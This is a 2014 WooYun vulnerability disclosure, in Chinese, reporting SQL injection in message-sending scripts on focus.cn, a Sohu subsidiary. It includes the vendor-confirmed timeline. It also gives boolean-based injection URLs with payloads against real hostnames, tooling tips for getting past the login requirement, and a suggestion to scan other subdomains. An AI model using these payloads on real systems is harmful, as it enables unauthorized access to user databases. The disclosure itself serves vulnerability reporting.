[公开漏洞]搜狐(第二季)旗下某站至少两处sql注入之一（开篇：直指3KW用户）

搜狐(第二季)旗下某站至少两处sql注入之一（开篇：直指3KW用户） 相关厂商： 搜狐 漏洞作者：浩天 提交时间：2014-05-04 11:00 公开时间：2014-06-18 11:00 漏洞类型：SQL注射漏洞 危害等级：高 自评Rank：20 漏洞状态： 厂商已经确认 漏洞来源：http://www.wooyun.org Tags标签： php+数字类型注射 数据库账户权限过高 php+Mysql 漏洞详情 披露状态：

2014-05-04：细节已通知厂商并且等待厂商处理中
2014-05-04：厂商已经确认，细节仅向厂商公开
2014-05-14：细节向核心白帽子及相关领域专家公开
2014-05-24：细节向普通白帽子公开
2014-06-03：细节向实习白帽子公开
2014-06-18：细节向公众公开

简要描述：

新一季开始了,但不知道能否延续十级,越来越不好找了，come on , baby!

详细说明：

先别扔sqlmap，这两个sql注入需要登录，但是由于cookie太长，扔sqlmap里直接就挂了，建议使用穿山甲预登陆，然后在尝试注入



注入点1：

http://onlinemsg.focus.cn/onlinemsg/sendmessage_f.php?senduser_id=1443102' and 1=1 and '%'='%

能找到用户名

http://onlinemsg.focus.cn/onlinemsg/sendmessage_f.php?senduser_id=1443102' and 1=2 and '%'='%

找不到用户名了

注入点2：同上

http://blogimg.focus.cn/common/modules/esfmsg/sendmessage_f.php?senduser_id=1443102

使用这个程序的sendmessage_f.php的，应该都存在这个问题，而且应该是直接读用户表的，对吧，通查子站吧，哈哈

漏洞证明：

1张图应该能证明了

上图是7个库，你懂的，可以翻看上一季的第四集，直指3KW的用户

http://paper.wooyun.org/bugs/wooyun-2010-057302

修复方案：

不多说了，第二季先开个好头，能不能多出几集就看你们修复的态度了

版权声明：转载请注明来源 浩天@乌云 漏洞回应 厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-05-04 11:11

厂商回复：

感谢

最新状态：

暂无